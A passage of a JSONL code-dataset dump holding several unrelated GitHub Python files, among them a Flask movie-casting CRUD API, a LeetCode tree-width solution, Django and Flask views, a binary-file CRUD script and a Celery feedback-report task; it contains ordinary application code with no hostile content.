abort(500, \"Agent '{}' already exists...\".format(\n                form['name']\n            ))\n\n        try:\n            new_agent = Agents(\n                name=form['name'],\n                joined_in=form['joined_in']\n            )\n            new_agent.insert()\n        except Exception as e:\n            abort(500, e)\n\n        return jsonify({\n            'agent': [new_agent.format()]\n        })\n\n    @app.route('/category', methods=['POST'])\n    @cross_origin()\n    @requires_auth('post:categories')\n    def new_category(payload):\n        \"\"\"\n        Add a Category here\n        :param payload:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n\n        if Category.query.filter_by(name=form['name']).first() is not None:\n            abort(500, 'Category {} already exists...'.format(\n                form['name']\n            ))\n\n        try:\n            new_category = Category(\n                name=form['name']\n            )\n            new_category.insert()\n        except Exception as e:\n            abort(500, e)\n\n        return jsonify({\n            'category': [new_category.format()]\n        })\n\n    @app.route('/movie', methods=['POST'])\n    @cross_origin()\n    @requires_auth('post:movies')\n    def new_movie(payload):\n        \"\"\"\n        Add a Movie here\n        :param payload:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n\n        if Movies.query.filter_by(title=form['title']).first() is not None:\n            abort(500, \"Movie '{}' already exists...\".format(\n                form['title']\n            ))\n\n        try:\n            new_movie = Movies(\n                title=form['title'],\n                release_date=form['release_date'],\n                rating=form['rating']\n            )\n\n            categories = [Category.query.filter_by(name=category).first() for category in form['categories']]\n            actors = [Actors.query.filter_by(name=actor).first() for actor in form['actors']]\n            new_movie.categories = categories\n            new_movie.actors = actors\n\n            # As I am not sure how to use 'uselist', this will suffice:\n            # for category in categories:\n            #     new_movie.categories.append(category)\n            # for actor in actors:\n            #     new_movie.actors.append(actor)\n\n            new_movie.insert()\n        except Exception as e:\n            abort(500, e)\n\n        return jsonify({\n            'movie': [new_movie.format()]\n        })\n\n    @app.route('/update/actor/<int:actor_id>', 
methods=['PATCH'])\n    @cross_origin()\n    @requires_auth('patch:actors')\n    def update_actor(payload, actor_id):\n        \"\"\"\n        Update an Actor here\n        :param payload:\n        :param actor_id:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n        current_actor = Actors.query.filter_by(id=actor_id).first_or_404()\n\n        if current_actor is None:\n            abort(500, \"Actor not found\")\n\n        try:\n            current_actor.name = form['name']\n            current_actor.gender = form['gender']\n            current_actor.age = form['age']\n            current_actor.joined_in = form['joined_in']\n            current_actor.agent_id = form['agent_id']\n            current_actor.update()\n        except Exception as e:\n            db.session.rollback()\n            abort(500, e)\n\n        return jsonify({\n            'actor': [current_actor.format()]\n        })\n\n    @app.route('/update/agent/<int:agent_id>', methods=['PATCH'])\n    @cross_origin()\n    @requires_auth('patch:agents')\n    def update_agent(payload, agent_id):\n        \"\"\"\n        Update an Agent here\n        :param payload:\n        :param agent_id:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n        current_agent = Agents.query.filter_by(id=agent_id).first_or_404()\n\n        if current_agent is None:\n            abort(500, \"Agent not found\")\n\n        try:\n            current_agent.name = form['name']\n            current_agent.joined_in = form['joined_in']\n            current_agent.update()\n        except Exception as e:\n            db.session.rollback()\n            abort(500, e)\n\n        return jsonify({\n            'agent': [current_agent.format()]\n        })\n\n    @app.route('/update/category/<int:category_id>', methods=['PATCH'])\n    @cross_origin()\n    @requires_auth('patch:categories')\n    def update_category(payload, category_id):\n        \"\"\"\n        Update a Category here\n        :param payload:\n        :param category_id:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n        current_category = Category.query.filter_by(id=category_id).first_or_404()\n\n        if current_category is None:\n            abort(500, \"Category not found\")\n\n        try:\n            current_category.name = form['name']\n            current_category.update()\n        except Exception as e:\n            db.session.rollback()\n            abort(500, e)\n\n        return jsonify({\n            'category': [current_category.format()]\n        })\n\n    @app.route('/update/movie/<int:movie_id>', methods=['PATCH'])\n    @cross_origin()\n    @requires_auth('patch:movies')\n    def update_movie(payload, movie_id):\n        \"\"\"\n        Update a Movie here\n        :param payload:\n        :param movie_id:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n        current_movie = Movies.query.filter_by(id=movie_id).first_or_404()\n\n        if current_movie is None:\n            abort(500, \"Movie not found\")\n\n        try:\n            current_movie.title = form['title']\n            current_movie.release_date = form['release_date']\n            current_movie.rating = form['rating']\n\n            # must delete the many to many items.\n            categories_delete = MoviesCategories.query.filter_by(movie_id=movie_id)\n            categories_delete.delete()\n\n            actors_delete = MoviesActors.query.filter_by(movie_id=movie_id)\n            actors_delete.delete()\n\n            categories = [Category.query.filter_by(name=category).first() for category in form['categories']]\n            actors = [Actors.query.filter_by(name=actor).first() for actor in form['actors']]\n\n            # As I am not sure how to use 'uselist', this will suffice:\n            for category in categories:\n                current_movie.categories.append(category)\n\n            for actor in actors:\n                current_movie.actors.append(actor)\n\n            current_movie.update()\n        except Exception as e:\n            db.session.rollback()\n            abort(500, e)\n\n        return jsonify({\n            'movie': [current_movie.format()]\n        })\n\n    @app.route('/actor/<int:actor_id>', methods=['DELETE'])\n    @cross_origin()\n    @requires_auth('delete:actors')\n    def remove_actor(payload, actor_id):\n        \"\"\"\n        Delete an Actor here\n        :param payload:\n        :param actor_id:\n        
:return:\n        \"\"\"\n        try:\n            current_actor = Actors.query.filter_by(id=actor_id).first_or_404()\n            deleted = current_actor.format()\n\n            if current_actor is None:\n                abort(404)\n\n            current_actor.delete()\n            all_actors = Actors.query.order_by(Actors.id).all()\n            current_actors = paginate(request, all_actors)\n\n            return jsonify({\n                'deleted': deleted,\n                'actors': current_actors,\n                'total_actors': len(all_actors)\n            })\n\n        except Exception as e:\n            abort(422, e)\n\n    @app.route('/agent/<int:agent_id>', methods=['DELETE'])\n    @cross_origin()\n    @requires_auth('delete:agents')\n    def remove_agent(payload, agent_id):\n        \"\"\"\n        Delete an Agent here\n        :param payload:\n        :param agent_id:\n        :return:\n        \"\"\"\n        try:\n            current_agent = Agents.query.filter_by(id=agent_id).first_or_404()\n            deleted = current_agent.format()\n\n            if current_agent is None:\n                abort(404)\n\n            current_agent.delete()\n            all_agents = Agents.query.order_by(Agents.id).all()\n            current_agents = paginate(request, all_agents)\n\n            return jsonify({\n                'deleted': deleted,\n                'agents': current_agents,\n                'total_agents': len(all_agents)\n            })\n\n        except Exception as e:\n            abort(422, e)\n\n    @app.route('/category/<int:category_id>', methods=['DELETE'])\n    @cross_origin()\n    @requires_auth('delete:categories')\n    def remove_category(payload, category_id):\n        \"\"\"\n        Delete a Category here\n        :param payload:\n        :param category_id:\n        :return:\n        \"\"\"\n        try:\n            current_category = Category.query.filter_by(id=category_id).first_or_404()\n            deleted = current_category.format()\n\n            if current_category is None:\n                abort(404)\n\n            current_category.delete()\n            all_categories = Category.query.order_by(Category.id).all()\n            current_categories = paginate(request, all_categories)\n\n            return jsonify({\n                'deleted': deleted,\n                'categories': current_categories,\n                'total_categories': len(all_categories)\n            })\n\n        except Exception as e:\n            abort(422, e)\n\n    @app.route('/movie/<int:movie_id>', methods=['DELETE'])\n    @cross_origin()\n    @requires_auth('delete:movies')\n    def remove_movie(payload, movie_id):\n        \"\"\"\n        Delete a Movie here\n        :param payload:\n        :param movie_id:\n        :return:\n        \"\"\"\n        try:\n            current_movie = Movies.query.filter_by(id=movie_id).first_or_404()\n            deleted = current_movie.format()\n\n            if current_movie is None:\n                abort(404)\n\n            current_movie.delete()\n            all_movies = Movies.query.order_by(Movies.id).all()\n            current_movies = paginate(request, all_movies)\n\n            return jsonify({\n                'deleted': deleted,\n                'movies': current_movies,\n                'total_movies': len(all_movies)\n            })\n\n        except Exception as e:\n            abort(422, e)\n\n    '''\n    Error Handlers go here\n    '''\n\n    @app.errorhandler(400)\n    def bad_request(error):\n        return jsonify({\n            'message': error.description,\n            'error': 400,\n            'success': False\n        }), 400\n\n    @app.errorhandler(401)\n    def unauthorized(error):\n        return jsonify({\n            'message': error.description,\n            'error': 401,\n            'success': False\n        }), 401\n\n    @app.errorhandler(404)\n    def not_found(error):\n        return jsonify({\n            'message': error.description,\n            'error': 404,\n            'success': False\n        }), 404\n\n    @app.errorhandler(405)\n    def not_allowed(error):\n        return jsonify({\n            'message': error.description,\n            'error': 405,\n            'success': False\n        }), 405\n\n    @app.errorhandler(422)\n    def unprocessable_entity(error):\n        return jsonify({\n            'message': error.description,\n            'error': 422,\n            'success': False\n        }), 422\n\n    @app.errorhandler(500)\n    def internal_error(error):\n        return jsonify({\n            'message': error.description,\n            'error': 500,\n            'success': False\n        }), 500\n\n    return app\n\n\napp = create_app()\nport = int(os.environ.get(\"PORT\", 8080))\n\nif __name__ == 
'__main__':\n app.run(host='0.0.0.0', port=port)\n","repo_name":"dafer660/Capstone","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17301705378","text":"# Given a binary tree, write a function to get the maximum width of the given tree. The maximum width of a tree is the maximum width among all levels.\n\n# The width of one level is defined as the length between the end-nodes (the leftmost and right most non-null nodes in the level, where the null nodes between the end-nodes are also counted into the length calculation.\n\n# It is guaranteed that the answer will in the range of 32-bit signed integer.\n\n# Example 1:\n\n# Input: \n\n# 1\n# / \\\n# 3 2\n# / \\ \\ \n# 5 3 9 \n\n# Output: 4\n# Explanation: The maximum width existing in the third level with the length 4 (5,3,null,9).\n# Example 2:\n\n# Input: \n\n# 1\n# / \n# 3 \n# / \\ \n# 5 3 \n\n# Output: 2\n# Explanation: The maximum width existing in the third level with the length 2 (5,3).\n# Example 3:\n\n# Input: \n\n# 1\n# / \\\n# 3 2 \n# / \n# 5 \n\n# Output: 2\n# Explanation: The maximum width existing in the second level with the length 2 (3,2).\n# Example 4:\n\n# Input: \n\n# 1\n# / \\\n# 3 2\n# / \\ \n# 5 9 \n# / \\\n# 6 7\n# Output: 8\n# Explanation:The maximum width existing in the fourth level with the length 8 (6,null,null,null,null,null,null,7).\n\nclass Solution:\n def widthOfBinaryTree(self, root: TreeNode) -> int:\n #use pre order traversal to iterate through tree\n #make queue of nodes, keeping track of their level and position\n #at the end of each level, subtract lowest position from highest position to get width \n print(root)\n if root.left == None and root.right == None:\n return 1\n \n currentLevel = 2\n lowest = 0\n highest = 0\n maxWidth = 0\n queue = []\n if root.left is not None:\n queue.append([2,1,root.left])\n \n if root.right is not None:\n queue.append([2,2,root.right])\n \n \n while len(queue) > 0:\n newNode = queue.pop(0)\n if newNode[0] != currentLevel:\n maxWidth = max(highest - lowest + 1, maxWidth)\n currentLevel += 1\n lowest = 0\n highest = 0\n \n if newNode[1] < lowest or lowest == 0:\n lowest = newNode[1]\n \n if newNode[1] > highest or highest == 0:\n highest = newNode[1]\n \n newLevel = currentLevel + 1\n \n if newNode[2].left != None:\n queue.append([newLevel,newNode[1]*2 - 1 , newNode[2].left])\n \n if newNode[2].right != None:\n queue.append([newLevel,newNode[1]*2 , newNode[2].right])\n \n maxWidth = max(highest - lowest + 1, maxWidth)\n \n return maxWidth","repo_name":"FelixAlvarado/notes","sub_path":"january 2021/maxWidthTree.py","file_name":"maxWidthTree.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40941600228","text":"from django.views.generic.edit import CreateView\nfrom django.contrib import messages\nfrom django.dispatch import Signal\n\nfrom .models import Contact\n\n\nclass ContactCreate(CreateView):\n model = Contact\n template_name = \"contact/contact_new.html\"\n fields = (\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"email\",\n \"message\",\n )\n\n def get_initial(self):\n initial = super(ContactCreate, self).get_initial()\n if self.request.user.is_authenticated:\n initial[\"email\"] = self.request.user.email\n return initial\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n if 
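The accepted maxWidthTree solution above tracks 1-indexed positions and per-level min/max by hand. A sketch of the same BFS idea with 0-indexed heap numbering, re-anchoring each level at its leftmost index so positions stay small on deep, sparse trees (the names are mine, not LeetCode's):

```python
from collections import deque

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def width_of_binary_tree(root):
    if root is None:
        return 0
    best = 0
    queue = deque([(root, 0)])  # (node, 0-indexed heap position)
    while queue:
        level_head = queue[0][1]
        for _ in range(len(queue)):
            node, pos = queue.popleft()
            pos -= level_head          # re-anchor so indices never blow up
            best = max(best, pos + 1)  # leftmost node in a level sits at 0
            if node.left:
                queue.append((node.left, 2 * pos))
            if node.right:
                queue.append((node.right, 2 * pos + 1))
    return best

# Example 1 from the problem statement: the third level has width 4.
root = TreeNode(1, TreeNode(3, TreeNode(5), TreeNode(3)),
                   TreeNode(2, None, TreeNode(9)))
assert width_of_binary_tree(root) == 4
```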
form.is_valid():\n            create_contact.send(sender=self.__class__, request=request)\n            messages.success(request, \"Message sent successfully\")\n            return self.form_valid(form)\n        else:\n            create_contact_failed.send(sender=self.__class__, request=request)\n            messages.error(request, \"Error sending message\")\n            return self.form_invalid(form)\n\n\ncreate_contact = Signal(providing_args=[\"request\"])\ncreate_contact_failed = Signal(providing_args=[\"request\"])\n","repo_name":"lsujh/cryptocurrency","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22222124344","text":"from flask import request, jsonify\n\nfrom sets import SERVER, CLIENT\nfrom app import app, sio\nfrom api import API, Error\n\n\n@app.route('/', methods=['POST'])\ndef index():\n\tx = request.json\n\t# print(x)\n\n\t# All required fields are not specified\n\n\tfor field in ('method', 'token'): # 'params', 'language'\n\t\tif field not in x:\n\t\t\treturn jsonify({'error': 2, 'result': 'All required fields are not specified!'})\n\n\t#\n\n\tapi = API(\n\t\tserver=SERVER,\n\t\tclient=CLIENT,\n\t\tsocketio=sio,\n\t\tip=request.remote_addr,\n\t\ttoken=x['token'] if 'token' in x else None,\n\t\tlanguage=x['language'] if 'language' in x else 'en',\n\t\tip_remote=x['ip'] if 'ip' in x else None,\n\t)\n\n\treq = {}\n\n\ttry:\n\t\tres = api.method(x['method'], x['params'] if 'params' in x else {})\n\n\texcept Error.BaseError as e:\n\t\treq['error'] = e.code\n\t\treq['result'] = str(e)\n\n\t# except Exception as e:\n\t# \treq['error'] = 1\n\t# \treq['result'] = 'Server error'\n\n\telse:\n\t\treq['error'] = 0\n\n\t\tif res:\n\t\t\treq['result'] = res\n\n\treturn jsonify(req)","repo_name":"kosyachniy/spbu","sub_path":"grid_and_cloud/project/api/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25922743988","text":"import os\r\nmaxi= 20\r\ncityFile = open('city.bin',\"wb+\")\r\nn=int(input(\"How many Entries: \"))\r\nfor loop in range(n):\r\n    city=input(\"Enter \"+ str(loop+1)+\" City name: \")\r\n    if(len(city)<20):\r\n        city=city+(maxi-len(city)) * ' '\r\n    city=city.encode()\r\n    cityFile.write(city)\r\ncityFile.seek(0)\r\nsize=os.path.getsize(\"city.bin\")\r\nn=int(size/maxi)\r\n\r\nwhile(True):\r\n    pos=0\r\n    cityFile.seek(0)\r\n    print(\"1. display all Records \")\r\n    print(\"2. search City\")\r\n    print(\"3. Insert City\")\r\n    print(\"4. Delete City\")\r\n    print(\"5. Update City\")\r\n    print(\"6. 
Exit\")\r\n ch=int(input(\"Enter your choise=>\"))\r\n if(ch==1):\r\n for loop in range(n):\r\n data=cityFile.read(maxi)\r\n print(data.decode())\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n elif(ch==2):\r\n pos=0\r\n found=False\r\n searchCity=input(\"Enter City name which you Want to search=>\")\r\n for loop in range(maxi):\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if name.rstrip().upper() == searchCity.upper():\r\n found = True\r\n print(name.rstrip(),\"Found on\",(loop+1),\"Position\")\r\n break\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n if found == False:\r\n print(searchCity,\"not Found\")\r\n elif(ch==3):\r\n found = False\r\n name=input(\"Enter new city name=>\")\r\n cityFile.seek(0,2)\r\n if(len(name)<20):\r\n name=name+(maxi-len(name)) * ' '\r\n name=name.encode()\r\n cityFile.write(name)\r\n n+=1\r\n found=True\r\n print(\"No of Records:\",n)\r\n if found==True:\r\n print(\"Record/s insert Successfully\")\r\n else:\r\n print(\"Record/s Not inserted\")\r\n elif(ch==4):\r\n found = False\r\n cityFile.seek(0)\r\n deleteCity=input(\"which city do you want yo delete?=>\")\r\n file2=open(\"newfile.bin\",\"wb\")\r\n for loop in range(n):\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if name.rstrip().upper() != deleteCity.upper():\r\n file2.write(name.encode())\r\n found=True\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n cityFile.close()\r\n file2.close()\r\n os.remove(\"city.bin\")\r\n os.rename(\"newfile.bin\",\"city.bin\")\r\n cityFile=open(\"city.bin\",\"rb+\")\r\n size=os.path.getsize(\"city.bin\")\r\n n=int(size/maxi)\r\n if found==True:\r\n print(\"Record/s delete Successfully\")\r\n else:\r\n print(\"Record/s Not deleted\")\r\n elif(ch==5):\r\n found = False\r\n pos=0\r\n oldName=input(\"Enter old City name=>\")\r\n newName=input(\"Enter new City name=>\")\r\n if(len(newName)<20):\r\n newName=newName+(maxi-len(newName)) * ' '\r\n if(len(oldName)<20):\r\n oldName=oldName+(maxi-len(oldName)) * ' '\r\n for loop in range(n):\r\n cityFile.seek(pos)\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if oldName.upper()==name.upper():\r\n found=True\r\n cityFile.seek(-20,1)\r\n cityFile.write(newName.encode())\r\n pos+=maxi\r\n if found==True:\r\n print(\"Record/s Update Successfully=>\")\r\n else:\r\n print(\"No records founds\")\r\n elif(ch==6):\r\n break\r\ncityFile.close()\r\n","repo_name":"yashdesai01/python","sub_path":"Binary_file/CRUD.py","file_name":"CRUD.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3896173862","text":"from r2base.engine.indexer import Indexer\nfrom r2base.engine.ranker import Ranker\nimport json\nimport numpy as np\nimport time\n\n\ndef wiki2doc(l):\n temp = json.loads(l)\n docs = [{'title': temp[0],\n 'text': temp[1][0:1000],\n 'seed': np.random.randint(0, 1000)}]\n return docs\n\n\nif __name__ == \"__main__\":\n path = \"data/tiny_zh_wiki.jsonl\"\n indexer = Indexer()\n ranker = Ranker()\n\n mapping = {\n 'title': {'type': 'keyword'},\n 'text': {'type': 'text',\n 'lang': 'zh',\n 'index': 'bm25'\n },\n 'seed': {'type': 'object'},\n '_meta': {\"type\": \"meta\",\n \"value\": {\"ok\": {\"encoder_id\": \"okok\",\n \"score\": \"123\"}}}\n }\n docs = []\n chunk_size = 10\n index = 'wiki-zh'\n indexer.delete_index(index)\n time.sleep(2)\n indexer.create_index(index, mapping)\n cnt = 0\n with open(path, 'r', encoding='utf8') as f:\n buffer = []\n for l in f:\n cnt += 1\n buffer.extend(wiki2doc(l))\n if len(buffer) % chunk_size == 0:\n 
indexer.add_docs(index, buffer, chunk_size, show_progress=True)\n                    buffer = []\n\n    print(\"DONE\")\n    print(ranker.query(index, {'match': {'text': \"数学\"}}))\n","repo_name":"ariafyy/R2Base","sub_path":"example/cjk_example.py","file_name":"cjk_example.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17678569254","text":"# -*- coding: utf-8 -*-\n\"\"\"Helper to build bench model for models that operate on pre-computed feature frames.\"\"\"\n\nfrom typing import Collection, Optional\n\nfrom loguru import logger\n\n__all__ = [\"DFModel\"]\n\n\nclass DFModel:\n    def __init__(self, model, features: Optional[Collection[str]] = None):\n        \"\"\"Initialize the model.\n\n        .. note::\n\n            If you use the model, you must set\n            :code:`patch_in_ds` in the\n            :py:class:`~mofdscribe.bench.mofbench.MOFBench` class.\n\n        Args:\n            model (object): Must implement `fit` and `predict` methods.\n                Using a sklearn function signature will work.\n            features (Collection[str], optional): Feature names to use.\n                If not provided, all features will be used.\n                Defaults to None.\n        \"\"\"\n        self._model = model\n        self._features = features\n\n    @property\n    def features(self):\n        if self._features is None:\n            self._features = list(self.ds.available_features)\n        return self._features\n\n    def fit(self, idx, structures, y):\n        logger.debug(\"Fitting model\")\n        X = self.ds._df[self.features].loc[idx, :]  # noqa: N806\n        logger.debug(X.shape)\n        self._model.fit(X, y)  # noqa: N806\n\n    def predict(self, idx, structures):\n        X = self.ds._df[self.features].loc[idx, :]  # noqa: N806\n        return self._model.predict(X)  # noqa: N806\n","repo_name":"kjappelbaum/mofdscribe","sub_path":"src/mofdscribe/bench/df_model.py","file_name":"df_model.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"79"} +{"seq_id":"37142432784","text":"from app.models import db, environment, SCHEMA, Group\n\n\ndef seed_groups():\n    group1 = Group(name='Starting 5')\n    group2 = Group(name='Core')\n\n    db.session.add(group1)\n    db.session.add(group2)\n    db.session.commit()\n\n\n\ndef undo_groups():\n    if environment == \"production\":\n        db.session.execute(f\"TRUNCATE table {SCHEMA}.groups RESTART IDENTITY CASCADE;\")\n    else:\n        db.session.execute(\"DELETE FROM groups\")\n\n    db.session.commit()\n","repo_name":"cgalang9/Splitify","sub_path":"app/seeds/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39973450575","text":"import json\r\nimport requests\r\nimport subprocess as sp\r\n\r\nurl = \"https://api.rootnet.in/covid19-in/stats/latest\"\r\nresponse = requests.get(url)\r\nparsed=response.text\r\ndata=json.loads(parsed)\r\n\r\ndef official_data(CVD):\r\n    #data printing of official data\r\n    CVD['cc'] = data['data']['summary']['total']\r\n\r\n    CVD['cci'] = data['data']['summary']['confirmedCasesIndian']\r\n\r\n    CVD['ccf'] = data['data']['summary']['confirmedCasesForeign']\r\n\r\n    CVD['recv'] = data['data']['summary']['discharged']\r\n\r\n    CVD['dead'] = data['data']['summary']['deaths']\r\n\r\n    CVD['active'] = CVD['cc']-(CVD['recv']+CVD['dead'])\r\n\r\n\r\ndef state_data(state, CVD):\r\n    state_info = data['data']['regional'][state]\r\n\r\n    CVD['cc'] = state_info['totalConfirmed']\r\n\r\n    CVD['cci'] = state_info['confirmedCasesIndian']\r\n\r\n    CVD['ccf'] = 
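Note that the indexing loop in cjk_example.py above only flushes when `len(buffer) % chunk_size == 0`, so a final partial buffer (fewer than `chunk_size` docs) is never indexed. A hedged sketch of the batching pattern with an explicit tail flush — `add_docs` is stubbed with a callback here rather than R2Base's real indexer:

```python
def batched_add(docs, chunk_size, add_docs):
    """Send docs to add_docs in fixed-size chunks, flushing any partial tail."""
    buffer = []
    for doc in docs:
        buffer.append(doc)
        if len(buffer) == chunk_size:
            add_docs(buffer)
            buffer = []
    if buffer:  # the leftover the original loop silently drops
        add_docs(buffer)

sent = []
batched_add(range(25), 10, lambda chunk: sent.append(list(chunk)))
assert [len(c) for c in sent] == [10, 10, 5]
```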
state_info['confirmedCasesForeign']\r\n\r\n CVD['recv'] = state_info['discharged']\r\n\r\n CVD['dead'] = state_info['deaths']\r\n\r\n CVD['active'] = CVD['cc']-(CVD['recv']+CVD['dead'])\r\n#Test code to see the number of states\r\n# for state in range(39):\r\n# try:\r\n# print(\"%s: '%s'\" % (state,data['data']['regional'][state]['loc']),end = \"\\n\") \r\n# except IndexError:\r\n# print(\"\\nBREAKING\\n-\")\r\n# break","repo_name":"AdwaitNPradhan/COVID-19-TRACKER-GUI","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39763237912","text":"import os\nimport time\nimport subprocess\nfrom celery import shared_task\nfrom .models import Station,Feedback,FeedbackInfo,AmazonRefShopList\nfrom datetime import datetime,timedelta\nfrom django.core.mail import send_mail,EmailMessage\nfrom django.template import loader\nfrom django.conf import settings\nimport pandas as pd\nfrom email.mime.image import MIMEImage\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport logging\nfrom selenium import webdriver\n\nlogger = logging.getLogger(\"django\")\n\n@shared_task\ndef update_feedback():\n feedback_list = FeedbackInfo.objects.all()\n for feedback in feedback_list:\n if not feedback.last_month:\n start_date = feedback.date\n last_month = start_date - timedelta(days=start_date.day-1) if start_date.day-1 else (start_date - timedelta(days=1)).replace(day=1)\n last_month_str = last_month.strftime('%Y-%m-%d')\n last_month_feedback = FeedbackInfo.objects.filter(date=last_month_str). \\\n filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n if last_month_feedback:\n feedback.last_month = feedback.lifetime - last_month_feedback[0].lifetime\n if not feedback.last_week:\n start_date = feedback.date\n days = start_date.weekday() if start_date.weekday() else 7\n last_week = start_date-timedelta(days=days)\n last_week_str = last_week.strftime('%Y-%m-%d')\n print(start_date,last_week,last_week_str)\n last_week_feedback = FeedbackInfo.objects.filter(date=last_week_str).\\\n filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n if last_week_feedback:\n feedback.last_week=feedback.lifetime-last_week_feedback[0].lifetime\n if not feedback.last_day:\n start_date = feedback.date\n last_day = start_date - timedelta(days=1)\n last_day_str = last_day.strftime('%Y-%m-%d')\n last_day_feedback = FeedbackInfo.objects.filter(date=last_day_str). 
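`update_feedback` in tasks.py above derives its "previous Monday" and "previous month boundary" lookup keys with inline timedelta arithmetic. The same two anchors as small pure functions make the edge cases (already a Monday, the 1st of a month) easy to unit-test; the function names are mine, not the project's:

```python
from datetime import date, timedelta

def previous_monday(d):
    """Most recent Monday strictly before d (a full week back if d is Monday)."""
    days = d.weekday() or 7
    return d - timedelta(days=days)

def month_anchor(d):
    """First of the current month, or of the previous month if d is the 1st,
    mirroring the branch in update_feedback."""
    if d.day > 1:
        return d.replace(day=1)
    return (d - timedelta(days=1)).replace(day=1)

assert previous_monday(date(2023, 6, 14)) == date(2023, 6, 12)  # a Wednesday
assert previous_monday(date(2023, 6, 12)) == date(2023, 6, 5)   # a Monday
assert month_anchor(date(2023, 6, 14)) == date(2023, 6, 1)
assert month_anchor(date(2023, 6, 1)) == date(2023, 5, 1)
```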
\\\n                filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n            if last_day_feedback:\n                feedback.last_day = feedback.lifetime - last_day_feedback[0].lifetime\n        feedback.save()\n\ndef feedback_image():\n    now = datetime.now()\n    last_monday = now if not now.weekday() else now - timedelta(days=now.weekday())\n    start_monday = last_monday - timedelta(days=29*7)\n    last_monday_str = last_monday.strftime(\"%Y-%m-%d\")\n    start_monday_str = start_monday.strftime(\"%Y-%m-%d\")\n    zone=\"US\"\n    days = pd.date_range(start=start_monday_str, end=last_monday_str,freq=\"7D\")\n    dates = [date.strftime(\"%Y-%m-%d\") for date in days]\n    if now.weekday(): # today is not Monday\n        dates.pop(0)\n        dates.append(now.strftime(\"%Y-%m-%d\"))\n    shop_list = AmazonRefShopList.objects.filter(zone=zone).filter(type=\"feedback\")\n    shop_name_list = [shop.shop_name for shop in shop_list]\n    tuples = [(shop_name, date) for shop_name in shop_name_list for date in dates]\n    index = pd.MultiIndex.from_tuples(tuples, names=['shop_name', 'day'])\n    data_frame = pd.DataFrame(0, index=index, columns=['last_week'])\n    feedback_list = FeedbackInfo.objects.filter(zone=zone).filter(date__in=dates)\n    print(feedback_list)\n    for feedback in feedback_list:\n        print(feedback.shop_name,feedback.date)\n        print(feedback.last_week)\n        if feedback.last_week:\n            #print(feedback.last_week)\n            data_frame.loc[(feedback.shop_name, feedback.date.strftime(\"%Y-%m-%d\")), 'last_week'] = int(\n                feedback.last_week)\n        else:\n            #print(\"no feedback last_week\")\n            data_frame.loc[(feedback.shop_name, feedback.date.strftime(\"%Y-%m-%d\")), 'last_week'] = 0\n    x = range(len(dates))\n    # Create the figure; the figsize parameter sets its width and height in inches (one inch = 80 px)\n\n    # print(data_frame)\n    plt.figure(figsize=(24,12))\n    plt.xticks(x, dates, rotation=60)\n    for shop_name in shop_name_list:\n        last_week = list(map(int, data_frame.loc[shop_name]['last_week'].values))\n        plt.plot(x, last_week,label=shop_name)\n    #plt.show()\n    plt.legend(loc='upper center',ncol=3)\n    #plt.title(\"Weekly growth\")
\n    base_path = settings.IMAGE_PATH\n    base_file_path = os.path.join(base_path,\"feedback_line_base{}.png\".format(int(time.time())))\n    final_file_path = os.path.join(base_path, \"feedback_line{}.png\".format(int(time.time())))\n    plt.savefig(base_file_path)  # save the figure\n    im = Image.open(base_file_path)\n    box = (200,100,2250,1200)  # set the region to crop\n    region = im.crop(box)\n    region.save(final_file_path)\n    return final_file_path\n\ndef add_img(src, img_id):\n    \"\"\"\n    Add an image to a rich-text email template\n    :param src:\n    :param img_id:\n    :return:\n    \"\"\"\n    fp = open(src, 'rb')\n    msg_image = MIMEImage(fp.read())\n    fp.close()\n    msg_image.add_header('Content-ID', '<'+img_id+'>')\n    return msg_image\n\n@shared_task\ndef send_email():\n    now = datetime.now()\n    now_str = now.strftime(\"%Y-%m-%d\")\n    date_str = now.strftime(\"%Y%m%d\")\n    zone_list = AmazonRefShopList.objects.filter(type=\"feedback\").values(\"zone\").distinct().all()\n    # print(zone_list)\n    zones = [zone['zone'] for zone in zone_list]\n    zone_feedback_list =[]\n    for zone in zones:\n        shop_list = AmazonRefShopList.objects.filter(zone=zone).filter(type=\"feedback\").order_by(\"shop_name\")\n        # 